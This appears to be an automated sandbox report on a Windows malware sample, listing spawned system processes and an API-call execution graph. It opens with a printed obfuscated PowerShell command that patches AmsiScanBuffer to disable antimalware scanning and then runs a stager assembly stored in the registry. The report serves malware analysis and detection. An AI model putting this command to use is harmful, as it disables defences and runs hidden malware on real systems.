@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$poeTVxHWVZq=$tBOzPEeXdclpo.GetMethod(''+'G'+''+'e'+''+'t'+'M'+'o'+'d'+[Char](117)+'l'+'e'+''+'H'+''+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')));$HcKZyefBJpvKrT=$YOhLAkBIOfDYUh.Invoke($Null,@([Object]$poeTVxHWVZq,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+'d'+[Char](76)+''+'i'+''+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$nXtMNPKuSorvJxsIp=$YOhLAkBIOfDYUh.Invoke($Null,@([Object]$poeTVxHWVZq,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+'r'+''+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$XeqQGMF=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HcKZyefBJpvKrT,$DyGxdRsDFLitOyBSDtJ).Invoke(''+[Char](97)+''+'m'+''+'s'+''+'i'+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'');$IPJIfzrUhQjJlmTUH=$YOhLAkBIOfDYUh.Invoke($Null,@([Object]$XeqQGMF,[Object](''+[Char](65)+'ms'+[Char](105)+''+'S'+''+'c'+'an'+[Char](66)+''+[Char](117)+'ffe'+[Char](114)+'')));$GrxNgCPqmZ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nXtMNPKuSorvJxsIp,$xwWcsbJiItNzaRumjCNQuH).Invoke($IPJIfzrUhQjJlmTUH,[uint32]8,4,[ref]$GrxNgCPqmZ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$IPJIfzrUhQjJlmTUH,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nXtMNPKuSorvJxsIp,$xwWcsbJiItNzaRumjCNQuH).Invoke($IPJIfzrUhQjJlmTUH,[uint32]8,0x20,[ref]$GrxNgCPqmZ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+'F'+''+'T'+'W'+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+'r'+''+[Char](98)+''+[Char](120)+''+[Char](45)+'s'+[Char](116)+''+'a'+''+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                                          Imagebase:0x7ff6e3d50000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:37
                                          Start time:08:54:43
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:38
                                          Start time:08:54:45
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\dllhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\dllhost.exe /Processid:{8d1ed557-2027-497c-a325-29d4d11b1321}
                                          Imagebase:0x7ff642ec0000
                                          File size:21'312 bytes
                                          MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:39
                                          Start time:08:54:45
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\winlogon.exe
                                          Wow64 process (32bit):false
                                          Commandline:winlogon.exe
                                          Imagebase:0x7ff70f350000
                                          File size:906'240 bytes
                                          MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:40
                                          Start time:08:54:45
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\lsass.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\lsass.exe
                                          Imagebase:0x7ff7ac940000
                                          File size:59'456 bytes
                                          MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:41
                                          Start time:08:54:46
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:42
                                          Start time:08:54:46
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\dwm.exe
                                          Wow64 process (32bit):false
                                          Commandline:"dwm.exe"
                                          Imagebase:0x7ff68eb30000
                                          File size:94'720 bytes
                                          MD5 hash:5C27608411832C5B39BA04E33D53536C
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:43
                                          Start time:08:54:48
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:44
                                          Start time:08:54:48
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:45
                                          Start time:08:54:49
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:46
                                          Start time:08:54:49
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:47
                                          Start time:08:54:50
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:48
                                          Start time:08:54:50
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:49
                                          Start time:08:54:50
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:50
                                          Start time:08:54:51
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:51
                                          Start time:08:54:51
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:52
                                          Start time:08:54:52
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:53
                                          Start time:08:54:52
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:54
                                          Start time:08:54:53
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k LocalService -p
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:55
                                          Start time:08:54:53
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:56
                                          Start time:08:54:53
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:57
                                          Start time:08:54:53
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:58
                                          Start time:08:54:53
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:638
                                          Start time:08:55:04
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\Conhost.exe
                                          Wow64 process (32bit):
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:
                                          Has administrator privileges:
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:656
                                          Start time:08:55:12
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\Conhost.exe
                                          Wow64 process (32bit):
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:
                                          Has administrator privileges:
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                            Execution Graph

                                            Execution Coverage:1%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:8%
                                            Total number of Nodes:1524
                                            Total number of Limit Nodes:2
                                            execution_graph
IsProcessorFeaturePresent 15526->15528 15527->15526 15529 253fc40d07f 15528->15529 15537 253fc40cd80 15529->15537 15533 253fc40cbc4 15532->15533 15534 253fc40cbc8 FlsGetValue 15532->15534 15535 253fc40cbde SetLastError 15533->15535 15536 253fc40c940 _invalid_parameter_noinfo 13 API calls 15533->15536 15534->15533 15535->15521 15536->15535 15538 253fc40cdba _invalid_parameter_noinfo 15537->15538 15539 253fc40cde2 RtlCaptureContext RtlLookupFunctionEntry 15538->15539 15540 253fc40ce64 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15539->15540 15541 253fc40ce2e RtlVirtualUnwind 15539->15541 15542 253fc40ceb6 _invalid_parameter_noinfo 15540->15542 15541->15540 15545 253fc408070 15542->15545 15546 253fc408079 15545->15546 15547 253fc408084 GetCurrentProcess TerminateProcess 15546->15547 15548 253fc408848 IsProcessorFeaturePresent 15546->15548 15549 253fc408860 15548->15549 15554 253fc40891c RtlCaptureContext 15549->15554 15555 253fc408936 RtlLookupFunctionEntry 15554->15555 15556 253fc408873 15555->15556 15557 253fc40894c RtlVirtualUnwind 15555->15557 15558 253fc408814 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 15556->15558 15557->15555 15557->15556 15560 253fc40c48f 15559->15560 15561 253fc410001 15559->15561 15563 253fc410054 15560->15563 15561->15560 15567 253fc410a40 15561->15567 15564 253fc40c49f 15563->15564 15565 253fc41006d 15563->15565 15564->15494 15565->15564 15577 253fc40e8c4 15565->15577 15568 253fc40cab0 _invalid_parameter_noinfo 14 API calls 15567->15568 15569 253fc410a4f 15568->15569 15575 253fc410a95 15569->15575 15576 253fc40c558 EnterCriticalSection 15569->15576 15575->15560 15578 253fc40cab0 _invalid_parameter_noinfo 14 API calls 15577->15578 15579 253fc40e8cd 15578->15579 18217 253fc40f370 VirtualProtect 17579 253fc408672 17580 253fc4090c0 __std_exception_copy 38 API calls 17579->17580 17581 253fc40869d 17580->17581 18218 253fc4146f5 18219 253fc409324 _CreateFrameInfo 9 API calls 
18218->18219 18220 253fc41470d 18219->18220 18221 253fc409324 _CreateFrameInfo 9 API calls 18220->18221 18222 253fc414728 18221->18222 18223 253fc409324 _CreateFrameInfo 9 API calls 18222->18223 18224 253fc41473c 18223->18224 18225 253fc409324 _CreateFrameInfo 9 API calls 18224->18225 18226 253fc41477e 18225->18226 15584 253fc405ff9 15585 253fc406000 VirtualProtect 15584->15585 15586 253fc406029 GetLastError 15585->15586 15587 253fc405f10 15585->15587 15586->15587 17588 253fc4041f9 17589 253fc404146 17588->17589 17590 253fc404196 VirtualQuery 17589->17590 17591 253fc4041b0 17589->17591 17592 253fc4041ca VirtualAlloc 17589->17592 17590->17589 17590->17591 17592->17591 17593 253fc4041fb GetLastError 17592->17593 17593->17589 17593->17591 15588 253fc40cbfc 15593 253fc40f3a0 15588->15593 15590 253fc40cc05 15591 253fc40cb10 __std_exception_copy 13 API calls 15590->15591 15592 253fc40cc22 __vcrt_uninitialize_ptd 15590->15592 15591->15592 15594 253fc40f3b5 15593->15594 15595 253fc40f3b1 15593->15595 15594->15595 15597 253fc40ef88 15594->15597 15595->15590 15598 253fc40f078 15597->15598 15606 253fc40efbd __vcrt_FlsAlloc 15597->15606 15615 253fc40c558 EnterCriticalSection 15598->15615 15600 253fc40efe2 LoadLibraryExW 15603 253fc40f107 15600->15603 15604 253fc40f007 GetLastError 15600->15604 15602 253fc40f120 GetProcAddress 15602->15598 15603->15602 15607 253fc40f117 FreeLibrary 15603->15607 15604->15606 15606->15598 15606->15600 15606->15602 15613 253fc40f041 LoadLibraryExW 15606->15613 15607->15602 15613->15603 15613->15606 16589 253fc40b500 16594 253fc40c558 EnterCriticalSection 16589->16594 18236 253fc402300 18237 253fc402331 18236->18237 18238 253fc402447 18237->18238 18245 253fc402355 18237->18245 18246 253fc402412 18237->18246 18239 253fc4024bb 18238->18239 18240 253fc40244c 18238->18240 18243 253fc4035c8 11 API calls 18239->18243 18239->18246 18253 253fc4035c8 GetProcessHeap HeapAlloc 18240->18253 18242 253fc40238d StrCmpNIW 18242->18245 18243->18246 18245->18242 
18245->18246 18247 253fc401d30 18245->18247 18248 253fc401db4 18247->18248 18249 253fc401d57 GetProcessHeap HeapAlloc 18247->18249 18248->18245 18249->18248 18250 253fc401d92 18249->18250 18251 253fc401cfc 2 API calls 18250->18251 18252 253fc401d9a GetProcessHeap HeapFree 18251->18252 18252->18248 18254 253fc40361b 18253->18254 18255 253fc4036d9 GetProcessHeap HeapFree 18254->18255 18256 253fc4036d4 18254->18256 18257 253fc403666 StrCmpNIW 18254->18257 18258 253fc401d30 6 API calls 18254->18258 18255->18246 18256->18255 18257->18254 18258->18254 17594 253fc40820c 17601 253fc408f34 17594->17601 17600 253fc408219 17602 253fc409340 _CreateFrameInfo 9 API calls 17601->17602 17603 253fc408215 17602->17603 17603->17600 17604 253fc40c288 17603->17604 17605 253fc40cb10 __std_exception_copy 13 API calls 17604->17605 17606 253fc408222 17605->17606 17606->17600 17607 253fc408f48 17606->17607 17610 253fc4092dc 17607->17610 17609 253fc408f51 17609->17600 17611 253fc4092ed 17610->17611 17615 253fc409302 17610->17615 17612 253fc409c8c _CreateFrameInfo 6 API calls 17611->17612 17613 253fc4092f2 17612->17613 17616 253fc409cd4 17613->17616 17615->17609 17617 253fc409aac __vcrt_FlsAlloc 5 API calls 17616->17617 17618 253fc409d02 17617->17618 17619 253fc409d14 TlsSetValue 17618->17619 17620 253fc409d0c 17618->17620 17619->17620 17620->17615 18282 253fc408f0c 18289 253fc40946c 18282->18289 18285 253fc408f19 18290 253fc409474 18289->18290 18292 253fc4094a5 18290->18292 18293 253fc408f15 18290->18293 18306 253fc409d28 18290->18306 18294 253fc4094b4 __vcrt_uninitialize_locks DeleteCriticalSection 18292->18294 18293->18285 18295 253fc409400 18293->18295 18294->18293 18311 253fc409bfc 18295->18311 18307 253fc409aac __vcrt_FlsAlloc 5 API calls 18306->18307 18308 253fc409d5e 18307->18308 18309 253fc409d73 InitializeCriticalSectionAndSpinCount 18308->18309 18310 253fc409d68 18308->18310 18309->18310 18310->18290 18312 253fc409aac __vcrt_FlsAlloc 5 API calls 18311->18312 18313 253fc409c21 
TlsAlloc 18312->18313 16609 253fc40c510 16610 253fc40c518 16609->16610 16611 253fc40c545 16610->16611 16613 253fc40c574 16610->16613 16614 253fc40c59f 16613->16614 16615 253fc40c5a3 16614->16615 16616 253fc40c582 DeleteCriticalSection 16614->16616 16615->16611 16616->16614 17649 253fc414611 __scrt_dllmain_exception_filter 17659 253fc40c218 17660 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17659->17660 17661 253fc40c228 17660->17661 17662 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17661->17662 17663 253fc40c23c 17662->17663 17664 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17663->17664 17665 253fc40c250 17664->17665 17666 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17665->17666 17667 253fc40c264 17666->17667 16617 253fc402518 GetProcessIdOfThread GetCurrentProcessId 16618 253fc402543 CreateFileW 16617->16618 16619 253fc4025be 16617->16619 16618->16619 16620 253fc402577 WriteFile ReadFile CloseHandle 16618->16620 16620->16619 15653 253fc40f820 15656 253fc40f7d8 15653->15656 15661 253fc40c558 EnterCriticalSection 15656->15661 17680 253fc40fe20 17681 253fc40fe4a 17680->17681 17682 253fc40d220 _invalid_parameter_noinfo 13 API calls 17681->17682 17683 253fc40fe6a 17682->17683 17684 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17683->17684 17685 253fc40fe78 17684->17685 17686 253fc40d220 _invalid_parameter_noinfo 13 API calls 17685->17686 17689 253fc40fea2 17685->17689 17688 253fc40fe94 17686->17688 17687 253fc40fec1 InitializeCriticalSectionEx 17687->17689 17690 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17688->17690 17689->17687 17691 253fc40feab 17689->17691 17690->17689 18348 253fc404320 18351 253fc40426d 18348->18351 18349 253fc4042bd VirtualQuery 18350 253fc4042d7 18349->18350 18349->18351 18351->18349 18351->18350 18352 253fc404322 GetLastError 18351->18352 18352->18350 18352->18351 
15710 253fc40c828 15711 253fc40c82d 15710->15711 15715 253fc40c842 15710->15715 15716 253fc40c848 15711->15716 15717 253fc40c88a 15716->15717 15721 253fc40c892 15716->15721 15719 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15717->15719 15718 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15720 253fc40c89f 15718->15720 15719->15721 15722 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15720->15722 15721->15718 15723 253fc40c8ac 15722->15723 15724 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15723->15724 15725 253fc40c8b9 15724->15725 15726 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15725->15726 15727 253fc40c8c6 15726->15727 15728 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15727->15728 15729 253fc40c8d3 15728->15729 15730 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15729->15730 15731 253fc40c8e0 15730->15731 15732 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15731->15732 15733 253fc40c8ed 15732->15733 15734 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15733->15734 15735 253fc40c8fd 15734->15735 15736 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15735->15736 15737 253fc40c90d 15736->15737 15742 253fc40c6f8 15737->15742 15756 253fc40c558 EnterCriticalSection 15742->15756 15759 253fc40ec30 GetCommandLineA GetCommandLineW 15760 253fc406430 15761 253fc40643d 15760->15761 15762 253fc406449 15761->15762 15769 253fc40655a 15761->15769 15763 253fc4064cd 15762->15763 15764 253fc4064a6 SetThreadContext 15762->15764 15764->15763 15765 253fc40663e 15767 253fc40665e 15765->15767 15776 253fc404b20 15765->15776 15766 253fc406581 VirtualProtect FlushInstructionCache 15766->15769 15780 253fc405530 GetCurrentProcess 15767->15780 15769->15765 15769->15766 15771 253fc4066b7 15774 253fc408070 
_invalid_parameter_noinfo 8 API calls 15771->15774 15772 253fc406677 ResumeThread 15773 253fc406663 15772->15773 15773->15771 15773->15772 15775 253fc4066ff 15774->15775 15778 253fc404b3c 15776->15778 15777 253fc404b9f 15777->15767 15778->15777 15779 253fc404b52 VirtualFree 15778->15779 15779->15778 15781 253fc40554c 15780->15781 15782 253fc405593 15781->15782 15783 253fc405562 VirtualProtect FlushInstructionCache 15781->15783 15782->15773 15783->15781 17692 253fc402ab4 TlsGetValue TlsGetValue TlsGetValue 17693 253fc402b0d 17692->17693 17698 253fc402b79 17692->17698 17695 253fc402b15 17693->17695 17693->17698 17694 253fc402b74 17695->17694 17696 253fc402c32 TlsSetValue TlsSetValue TlsSetValue 17695->17696 17697 253fc403f88 StrCmpNIW 17695->17697 17696->17694 17697->17695 17698->17694 17698->17696 17699 253fc403f88 StrCmpNIW 17698->17699 17699->17698 15808 253fc4034b8 15809 253fc4034e8 15808->15809 15810 253fc4035a1 15809->15810 15811 253fc403505 PdhGetCounterInfoW 15809->15811 15811->15810 15812 253fc403523 GetProcessHeap HeapAlloc PdhGetCounterInfoW 15811->15812 15813 253fc403555 StrCmpW 15812->15813 15814 253fc40358d GetProcessHeap HeapFree 15812->15814 15813->15814 15815 253fc40356a 15813->15815 15814->15810 15815->15814 15817 253fc403950 StrCmpNW 15815->15817 15818 253fc4039f2 15817->15818 15819 253fc403982 StrStrW 15817->15819 15818->15815 15819->15818 15820 253fc40399b StrToIntW 15819->15820 15820->15818 15821 253fc4039c3 15820->15821 15821->15818 15827 253fc401a30 OpenProcess 15821->15827 15828 253fc401a64 K32GetModuleFileNameExW 15827->15828 15829 253fc401ab6 15827->15829 15830 253fc401aad CloseHandle 15828->15830 15831 253fc401a7e PathFindFileNameW lstrlenW 15828->15831 15829->15818 15833 253fc403f88 15829->15833 15830->15829 15831->15830 15832 253fc401a9c StrCpyW 15831->15832 15832->15830 15834 253fc403f95 StrCmpNIW 15833->15834 15835 253fc4039e4 15833->15835 15834->15835 15835->15818 15836 253fc401cfc 15835->15836 15837 253fc401d13 15836->15837 15838 
253fc401d1c 15836->15838 15839 253fc401530 2 API calls 15837->15839 15838->15818 15839->15838 15840 253fc4334b8 15841 253fc4334e8 15840->15841 15842 253fc4335a1 15841->15842 15843 253fc433505 PdhGetCounterInfoW 15841->15843 15843->15842 15844 253fc433523 GetProcessHeap HeapAlloc PdhGetCounterInfoW 15843->15844 15845 253fc433555 StrCmpW 15844->15845 15846 253fc43358d GetProcessHeap HeapFree 15844->15846 15845->15846 15848 253fc43356a 15845->15848 15846->15842 15848->15846 15849 253fc433950 StrCmpNW 15848->15849 15850 253fc433982 StrStrW 15849->15850 15853 253fc4339f2 15849->15853 15851 253fc43399b StrToIntW 15850->15851 15850->15853 15852 253fc4339c3 15851->15852 15851->15853 15852->15853 15859 253fc431a30 OpenProcess 15852->15859 15853->15848 15860 253fc431ab6 15859->15860 15861 253fc431a64 K32GetModuleFileNameExW 15859->15861 15860->15853 15865 253fc433f88 15860->15865 15862 253fc431a7e PathFindFileNameW lstrlenW 15861->15862 15863 253fc431aad CloseHandle 15861->15863 15862->15863 15864 253fc431a9c StrCpyW 15862->15864 15863->15860 15864->15863 15866 253fc433f95 StrCmpNIW 15865->15866 15867 253fc4339e4 15865->15867 15866->15867 15867->15853 15868 253fc431cfc 15867->15868 15869 253fc431d1c 15868->15869 15870 253fc431d13 15868->15870 15869->15853 15872 253fc431530 15870->15872 15873 253fc431580 15872->15873 15876 253fc43154a 15872->15876 15873->15869 15874 253fc431569 StrCmpW 15874->15876 15875 253fc431561 StrCmpIW 15875->15876 15876->15873 15876->15874 15876->15875 16625 253fc4081c0 16626 253fc4081c9 __scrt_acquire_startup_lock 16625->16626 16627 253fc4081cd 16626->16627 16629 253fc40bbb4 16626->16629 16630 253fc40bbd4 16629->16630 16657 253fc40bbed 16629->16657 16631 253fc40bbdc 16630->16631 16632 253fc40bbf2 16630->16632 16633 253fc40d1f4 __std_exception_copy 13 API calls 16631->16633 16634 253fc40e864 56 API calls 16632->16634 16635 253fc40bbe1 16633->16635 16636 253fc40bbf7 16634->16636 16637 253fc40d04c _invalid_parameter_noinfo 38 API calls 16635->16637 16658 
